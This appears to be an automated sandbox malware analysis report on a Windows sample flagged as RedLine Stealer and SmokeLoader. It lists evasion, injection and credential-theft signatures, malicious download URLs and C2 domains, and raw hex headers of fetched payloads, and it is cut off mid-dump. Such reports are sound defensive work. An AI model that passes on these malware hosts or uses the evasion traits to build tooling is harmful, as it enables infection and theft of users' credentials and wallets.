Windows Analysis Report y4oMrtO1Mt.exe

Overview

General Information

Sample Name: y4oMrtO1Mt.exe
Analysis ID: 518780
MD5: db2ef30e8f821c8f00456941f5944849
SHA1: 01a08a69f1e8e6d822ece577a9ebe84a0c7f5f60
SHA256: 433cf9125a44e304eca2c5cf3bfe2af0b1deafd1c5e8d13d559e1bac9de711b3
Tags: exeRedLineStealer
Infos:

Most interesting Screenshot:

Detection

RedLine SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
DLL reload attack detected
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect sandboxes and other dynamic analysis tools (window names)
Query firmware table information (likely to detect VMs)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Adds a directory exclusion to Windows Defender
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Checks if the current machine is a virtual machine (disk enumeration)
PE file contains section with special chars
Hides threads from debuggers
.NET source code references suspicious native API functions
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Sigma detected: Powershell Defender Exclusion
.NET source code contains method to dynamically call methods (often used by packers)
PE file has nameless sections
Machine Learning detection for dropped file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality for execution timing, often used to detect debuggers
Entry point lies outside standard sections
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://privacytoolzforyou7000.top/downloads/toolspab2.exe Avira URL Cloud: Label: malware
Source: http://host-host-file6.com/files/7993_1636371023_9825.exe Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\82DC.exe Avira: detection malicious, Label: HEUR/AGEN.1144480
Multi AV Scanner detection for submitted file
Source: y4oMrtO1Mt.exe Virustotal: Detection: 28% Perma Link
Multi AV Scanner detection for domain / URL
Source: http://privacytoolzforyou7000.top/downloads/toolspab2.exe Virustotal: Detection: 11% Perma Link
Source: http://host-host-file6.com/files/7993_1636371023_9825.exe Virustotal: Detection: 15% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\8039.exe ReversingLabs: Detection: 35%
Source: C:\Users\user\AppData\Local\Temp\82DC.exe ReversingLabs: Detection: 53%
Source: C:\Users\user\AppData\Local\Temp\9D57.exe ReversingLabs: Detection: 74%
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Metadefender: Detection: 45% Perma Link
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Roaming\argjvbv ReversingLabs: Detection: 74%
Machine Learning detection for sample
Source: y4oMrtO1Mt.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\F72D.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\610B.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\82DC.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\8039.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\hrgjvbv Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\argjvbv Joe Sandbox ML: detected

Compliance:

barindex
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49868 version: TLS 1.0
Uses 32bit PE files
Source: y4oMrtO1Mt.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\AppData\Local\Temp\9D57.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49880 version: TLS 1.2
Source: Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: 59B4.exe, 00000013.00000002.958716562.0000000000EB9000.00000004.00000020.sdmp
Source: Binary string: \??\C:\Windows\System.ServiceModel.pdb source: 59B4.exe, 00000013.00000002.958716562.0000000000EB9000.00000004.00000020.sdmp
Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: AdvancedRun.exe, 0000001C.00000000.907769722.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000001E.00000000.914935574.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.24.dr
Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdbU source: 59B4.exe, 00000013.00000002.958716562.0000000000EB9000.00000004.00000020.sdmp
Source: Binary string: C:\feze\liyixira.pdb source: 9D57.exe.5.dr
Source: Binary string: C:\samuf.pdb source: y4oMrtO1Mt.exe
Source: Binary string: _.pdb source: 610B.exe, 0000001B.00000002.954434043.00000000036B5000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: 9D57.exe, 00000017.00000002.879476866.000000006D221000.00000020.00020000.sdmp, 1105.tmp.23.dr
Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdbr9 source: 59B4.exe, 00000013.00000002.958716562.0000000000EB9000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb source: 9D57.exe, 1105.tmp.23.dr
Source: Binary string: System.ServiceModel.pdbH source: 59B4.exe, 00000013.00000002.958905948.0000000000F3F000.00000004.00000020.sdmp
Source: Binary string: System.ServiceModel.pdb source: 59B4.exe, 00000013.00000002.958905948.0000000000F3F000.00000004.00000020.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb7] source: 59B4.exe, 00000013.00000002.958716562.0000000000EB9000.00000004.00000020.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: 59B4.exe, 00000013.00000002.958716562.0000000000EB9000.00000004.00000020.sdmp
Source: Binary string: #cC:\zan\cesibevu.pdb source: 610B.exe.5.dr
Source: Binary string: C:\zan\cesibevu.pdb source: 610B.exe.5.dr
Source: Binary string: %C:\feze\liyixira.pdbp+@` source: 9D57.exe.5.dr

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Code function: 4x nop then add dword ptr [ebp-5Ch], 01h 24_2_03020520
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Code function: 4x nop then jmp 0302100Dh 24_2_03020DD0
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 24_2_030291CC
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 24_2_030291D8
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Code function: 4x nop then jmp 0302100Dh 24_2_03020DC0

Networking:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: cdn.discordapp.com
Source: C:\Windows\explorer.exe Domain query: nalirou70.top
Source: C:\Windows\explorer.exe Network Connect: 216.128.137.31 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: nusurtal4f.net
Source: C:\Windows\explorer.exe Domain query: host-host-file6.com
Source: C:\Windows\explorer.exe Domain query: hajezey10.top
Source: C:\Windows\explorer.exe Domain query: privacytoolzforyou7000.top
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/902526114763767818/A623D0D3.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/902526117016109056/AB0F9338.jpg HTTP/1.1Host: cdn.discordapp.com
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 09 Nov 2021 21:20:51 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38Last-Modified: Tue, 09 Nov 2021 21:20:02 GMTETag: "47800-5d061ac268811"Accept-Ranges: bytesContent-Length: 292864Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd 92 82 96 f9 f3 ec c5 f9 f3 ec c5 f9 f3 ec c5 96 85 47 c5 d3 f3 ec c5 96 85 72 c5 e8 f3 ec c5 96 85 46 c5 9e f3 ec c5 f0 8b 7f c5 fe f3 ec c5 f9 f3 ed c5 7c f3 ec c5 96 85 43 c5 f8 f3 ec c5 96 85 76 c5 f8 f3 ec c5 96 85 71 c5 f8 f3 ec c5 52 69 63 68 f9 f3 ec c5 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 4d 64 d7 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 14 03 00 00 a6 70 02 00 00 00 00 60 82 01 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 74 02 00 04 00 00 31 08 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec 16 03 00 50 00 00 00 00 a0 72 02 10 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 72 02 c0 17 00 00 40 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 7b 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a8 12 03 00 00 10 00 00 00 14 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 2c 64 6f 02 00 30 03 00 00 12 00 00 00 18 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 42 00 00 00 a0 72 02 00 44 00 00 00 2a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 09 01 00 00 f0 72 02 00 0a 01 00 00 6e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 09 Nov 2021 21:21:10 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38Last-Modified: Tue, 09 Nov 2021 09:20:58 GMTETag: "2a16d8-5d057a09c5eba"Accept-Ranges: bytesContent-Length: 2758360Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 ae 4c 1d b2 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 18 03 00 00 8e 0a 00 00 00 00 00 08 10 48 00 00 20 00 00 00 40 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 6f 00 00 04 00 00 5e 9a 2a 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3a c0 08 00 50 00 00 00 00 c0 69 00 6f 43 05 00 00 00 00 00 00 00 00 00 00 fe 29 00 d8 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 20 20 20 20 20 00 20 03 00 00 20 00 00 00 90 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 20 20 20 20 20 20 20 20 68 4e 05 00 00 40 03 00 00 04 01 00 00 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 20 20 20 20 20 20 20 20 0c 00 00 00 00 a0 08 00 00 02 00 00 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 69 64 61 74 61 00 00 00 20 00 00 00 c0 08 00 00 02 00 00 00 9a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 7e c2 a9 5c 31 38 34 37 00 20 00 00 00 e0 08 00 00 08 00 00 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 68 65 6d 69 64 61 00 80 3e 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 e0 2e 62 6f 6f 74 00 00 00 00 fa 21 00 00 80 47 00 00 fa 21 00 00 a4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 7e c2 a9 5c 31 38 34 37 50 0c 00 00 00 80 69 00 00 0e 00 00 00 9e 24 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 7e c2 a9 5c 31 38 34 37 50 0c 00 00 00 a0 69 00 00 0e 00 00 00 ac 24 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 6f 43 05 00 00 c0 69 00 00 44 05 00 00 ba 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 09 Nov 2021 21:21:26 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38Last-Modified: Mon, 08 Nov 2021 18:24:52 GMTETag: "48000-5d04b1be8e47b"Accept-Ranges: bytesContent-Length: 294912Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d2 78 89 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 e2 00 00 00 9a 03 00 00 00 00 00 0a c0 04 00 00 c0 03 00 00 20 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 cc 03 00 53 00 00 00 00 a0 04 00 f6 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 04 00 08 00 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 48 00 00 00 00 00 00 00 00 00 00 00 29 45 57 68 67 1f 4e 46 20 8d 03 00 00 20 00 00 00 8e 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 65 78 74 00 00 00 34 de 00 00 00 c0 03 00 00 e0 00 00 00 92 03 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f6 09 00 00 00 a0 04 00 00 0a 00 00 00 72 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 c0 04 00 00 02 00 00 00 7c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 04 00 00 02 00 00 00 7e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 09 Nov 2021 21:21:33 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38Last-Modified: Mon, 08 Nov 2021 14:16:28 GMTETag: "39000-5d047a389ed49"Accept-Ranges: bytesContent-Length: 233472Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 a4 78 4c 60 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 3a 01 00 00 dc 02 00 00 00 00 00 cc 1e 00 00 00 10 00 00 00 50 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 04 00 00 04 00 00 ec b5 03 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 82 01 00 3c 00 00 00 00 20 02 00 d0 fc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 51 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 6e 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 01 00 6c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 70 39 01 00 00 10 00 00 00 3a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a0 3a 00 00 00 50 01 00 00 3c 00 00 00 3e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c4 8e 00 00 00 90 01 00 00 18 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d0 fc 01 00 00 20 02 00 00 fe 01 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 09 Nov 2021 21:21:50 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38Last-Modified: Tue, 09 Nov 2021 21:21:02 GMTETag: "59400-5d061afb7963f"Accept-Ranges: bytesContent-Length: 365568Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd 92 82 96 f9 f3 ec c5 f9 f3 ec c5 f9 f3 ec c5 96 85 47 c5 d3 f3 ec c5 96 85 72 c5 e8 f3 ec c5 96 85 46 c5 9e f3 ec c5 f0 8b 7f c5 fe f3 ec c5 f9 f3 ed c5 7c f3 ec c5 96 85 43 c5 f8 f3 ec c5 96 85 76 c5 f8 f3 ec c5 96 85 71 c5 f8 f3 ec c5 52 69 63 68 f9 f3 ec c5 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 32 b7 75 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 30 04 00 00 a6 70 02 00 00 00 00 10 9e 02 00 00 10 00 00 00 40 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 75 02 00 04 00 00 a6 1f 06 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 9c 32 04 00 50 00 00 00 00 b0 73 02 10 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 02 b0 17 00 00 40 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 97 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 2e 04 00 00 10 00 00 00 30 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 2c 64 6f 02 00 40 04 00 00 12 00 00 00 34 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 42 00 00 00 b0 73 02 00 44 00 00 00 46 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 09 01 00 00 00 74 02 00 0a 01 00 00 8a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 